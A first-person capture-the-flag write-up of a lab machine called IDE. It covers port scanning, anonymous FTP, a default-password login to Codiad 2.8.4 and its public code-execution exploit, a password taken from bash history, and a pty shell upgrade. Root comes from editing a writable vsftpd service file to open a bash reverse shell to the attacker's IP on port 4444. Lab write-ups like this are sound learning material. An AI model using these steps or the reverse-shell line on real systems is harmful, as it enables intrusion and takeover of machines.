Recon :
βββ(neoγΏ0xneoxploit)-[~]
ββ$ rustscan -a 10.10.56.175 --ulimit 5000 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time β
[~] The config file is expected to be at "/home/neo/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.56.175:21
Open 10.10.56.175:80
Open 10.10.56.175:22
Open 10.10.56.175:62337
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sC -sV" on ip 10.10.56.175
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-27 01:17 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:17
Completed NSE at 01:17, 0.00s elapsed
Initiating Ping Scan at 01:17
Scanning 10.10.56.175 [4 ports]
Completed Ping Scan at 01:17, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:17
Completed Parallel DNS resolution of 1 host. at 01:17, 0.14s elapsed
DNS resolution of 1 IPs took 0.14s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:17
Scanning 10.10.56.175 [4 ports]
Discovered open port 22/tcp on 10.10.56.175
Discovered open port 21/tcp on 10.10.56.175
Discovered open port 80/tcp on 10.10.56.175
Discovered open port 62337/tcp on 10.10.56.175
Completed SYN Stealth Scan at 01:17, 0.19s elapsed (4 total ports)
Initiating Service scan at 01:17
Scanning 4 services on 10.10.56.175
Completed Service scan at 01:18, 11.63s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.56.175.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:18
NSE: [ftp-bounce 10.10.56.175:21] PORT response: 500 Illegal PORT command.
Completed NSE at 01:18, 7.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 1.50s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
Nmap scan report for 10.10.56.175
Host is up, received echo-reply ttl 63 (0.17s latency).
Scanned at 2025-02-27 01:17:55 EST for 20s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.96.143
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC94RvPaQ09Xx+jMj32opOMbghuvx4OeBVLc+/4Hascmrtsa+SMtQGSY7b+eyW8Zymxi94rGBIN2ydPxy3XXGtkaCdQluOEw5CqSdb/qyeH+L/1PwIhLrr+jzUoUzmQil+oUOpVMOkcW7a00BMSxMCij0HdhlVDNkWvPdGxKBviBDEKZAH0hJEfexz3Tm65cmBpMe7WCPiJGTvoU9weXUnO3+41Ig8qF7kNNfbHjTgS0+XTnDXk03nZwIIwdvP8dZ8lZHdooM8J9u0Zecu4OvPiC4XBzPYNs+6ntLziKlRMgQls0e3yMOaAuKfGYHJKwu4AcluJ/+g90Hr0UqmYLHEV
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBzKTu7YDGKubQ4ADeCztKu0LL5RtBXnjgjE07e3Go/GbZB2vAP2J9OEQH/PwlssyImSnS3myib+gPdQx54lqZU=
| 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ+oGPm8ZVYNUtX4r3Fpmcj9T9F2SjcRg4ansmeGR3cP
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B4A327D2242C42CF2EE89C623279665F
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 01:18
Completed NSE at 01:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.08 seconds
Raw packets sent: 8 (328B) | Rcvd: 23 (924B)
So we can see four ports open on the target machine, and ftp-anon: Anonymous FTP login allowed, so im gonna try ftp first :
Accessing FTP
βββ(neoγΏ0xneoxploit)-[~]
ββ$ ftp 10.10.56.175
Connected to 10.10.56.175.
220 (vsFTPd 3.0.3)
Name (10.10.56.175:neo): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10922|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||24419|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> ls .
229 Entering Extended Passive Mode (|||59352|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls ..
229 Entering Extended Passive Mode (|||31772|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls ...
229 Entering Extended Passive Mode (|||27213|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> cd ....
550 Failed to change directory.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||50399|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||14897|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |***************************************************************************************************************| 151 120.08 KiB/s 00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (0.86 KiB/s)
ftp> exit
221 Goodbye.
after logging into FTP, we can see there is a folder named ββ¦β and inside that there is a file name β-β so i got that to my local machine first and lets see whats inside ,
βββ(neoγΏ0xneoxploit)-[~]
ββ$ file -
^C
βββ(neoγΏ0xneoxploit)-[~]
ββ$ mv - ide
βββ(neoγΏ0xneoxploit)-[~]
ββ$ file ide
ide: ASCII text
βββ(neoγΏ0xneoxploit)-[~]
ββ$ cat ide
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
as we cant do commands with file name β-β i renamed that to IDE as the challenge name , and i got this message.
So lets see other ports,
Port 80
There is nothing more than The default Apache page
Port 62337
So in here we have a Codiad 2.8.4 login page and as the previous message we found on the FTP server we can use username john and try some default passwords as βpasswordβ and more.
and yeah, it worked (after trying 5 times :3 cuz username is case sensitive and John need to be βjohnβ)
As we now logged into the codiad i see nothing interesting for the next step so i googled βCodiad 2.8.4β and suddenly got Codiad Remote Code Execute Exploit,
So im gonna try that to see if that works :
It worked and we are in,
so i went to /home/drac and cat user.txt and its saying permission denied, so i had to go thorough a writeup and they inspected the bash history file (Learned something new) so there i can see a password and then i tried to su drac
it didnt work either cuz i got a error saying :
www-data@ide:/home/drac$ su drac
su drac
su: must be run from a terminal
so after googling i found this : The command:
python3 -c 'import pty; pty.spawn("/bin/bash")'
What It Does:
-
python3 -c: Runs the given Python code as a one-liner from the command line.
-
import pty: Imports the pty (pseudo-terminal) module in Python.
-
pty.spawn(β/bin/bashβ):
β’ Calls pty.spawn() to start a new interactive shell (/bin/bash).
β’ It connects the standard input/output of the Python process to a pseudo-terminal, effectively upgrading a simple shell to a fully interactive shell.
Common Use Cases:
β’ Upgrading a shell: If you have a limited shell (e.g., a reverse shell with minimal capabilities), running this command can give you a fully interactive terminal.
β’ Bypassing input/output restrictions: Some restricted shells may have disabled interactive features, and using pty.spawn() can help restore full functionality.
β’ Testing pseudo-terminal interactions: Useful for debugging interactive programs that expect a real terminal.
Ethical Considerations:
-
This is often used in penetration testing or ethical hacking (e.g., upgrading a reverse shell in a CTF or Red Team scenario).
-
Running this command in an unauthorized environment (such as bypassing security restrictions) may violate policies or laws.
so i tried it and it worked :
www-data@ide:/home/drac$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ide:/home/drac$ su drac
su drac
Password: Th3dRaCULa1sR3aL
drac@ide:~$ ls
lsca
user.txt
drac@ide:~$ cat user.txt
cacat user.txt
Command 'cacat' not found, did you mean:
command 'acat' from deb atool
command 'pacat' from deb pulseaudio-utils
command 'chcat' from deb policycoreutils-python-utils
command 'ccat' from deb ccrypt
command 'cdcat' from deb cdcat
Try: sudo apt install <deb name>
drac@ide:~$ cat user.txt
cat user.txt
02930d21a8eb009f6**********
Root.txt
For prviesc im gonna use linpeas for this (first time), For privilege escalation processes, first letβs download linPEAS, a very useful script, to our system, then letβs install it on the target system and find possible vulnerabilities. To do this, from our own system, Letβs run the commands:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250223-a8d560c8/linpeas.shthen host it on your own machine and download it to victim machine
ON YOUR MACHINE :
sudo python3 -m http.server 8000ON IDE Reverse SHELL :
drac@ide:~$ wget http://10.14.96.143:8000/linpeas.sh
wget http://10.14.96.143:8000/linpeas.sh
--2025-02-27 09:08:55-- http://10.14.96.143:8000/linpeas.sh
Connecting to 10.14.96.143:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 840082 (820K) [text/x-sh]
Saving to: βlinpeas.shβ
linpeas.sh 0%[ ] 0 --.-linpeas.sh 4%[ ] 39.91K 110linpeas.sh 16%[==> ] 138.82K 235linpeas.sh 34%[=====> ] 285.98K 316linpeas.sh 75%[==============> ] 615.54K 557linpeas.sh 100%[===================>] 820.39K 732KB/s in 1.1s
2025-02-27 09:08:57 (732 KB/s) - βlinpeas.shβ saved [840082/840082]
drac@ide:~$ ls
ls
linpeas.sh user.txt
drac@ide:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
drac@ide:~$ ./linpeas.sh
./linpeas.sh
ββββββββββββββ
βββββββ ββββββββ
βββββββ ββββββββββββββββββββ ββββ
ββββ β ββββββββββββββββββββββββββββββ ββββββ
β βββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββ βββββ βββββββββββββββββ
βββββββββββ ββββββ ββββββ β
ββββββ ββββββββ ββββ
ββ βββ βββββ βββ
ββ ββββββββββββ ββ
β ββ βββββββββββββββββββββββββββββ ββ
β βββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββ ββββ
βββββ βββββ ββββββ ββββ
ββββ βββββ βββββ β ββ
βββββ βββββ βββββββ βββββ βββββ
ββββββ βββββββ βββββββ βββββββ βββββ
ββββββββββββββ β βββββββββββββββ
βββββββββββββ ββββββββββββββ
βββββββββββ ββββββββββββββ
ββββββββββββββββββ ββββββββββββββββββββ
βββββ ββββββββββββββββββββββββββ βββββββββββββ
ββββββββ ββββββββββ ββββββββ
βββββββββββββββββββββββ
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : https://training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
LinPEAS-ng by carlospolop
and we can see this on linpeas :
ββββββββββββ£ Interesting GROUP writable files (not in Home) (max 200)
β https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
Group drac:
/lib/systemd/system/vsftpd.service Letβs see what is running on the vsftpd service, which is shown with special colors.
drac@ide:~$ cat /etc/systemd/system/multi-user.target.wants/vsftpd.service
cat /etc/systemd/system/multi-user.target.wants/vsftpd.service
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
i tried to edit the service file and got a ERROR
drac@ide:~$ nano /etc/systemd/system/multi-user.target.wants/vsftpd.service
nano /etc/systemd/system/multi-user.target.wants/vsftpd.service
Error opening terminal: unknown.i tried to login to drac via ssh as there was a port 22 open, and it worked from there i tried the nano, Now, based on our authority, we can edit the service as we want. For example, letβs send a shell to our 4444 :
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.14.96.143/4444 0>&1' // line i eddited
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty
[Install]
WantedBy=multi-user.target
and YEAH, got the Root on /root/root.txt
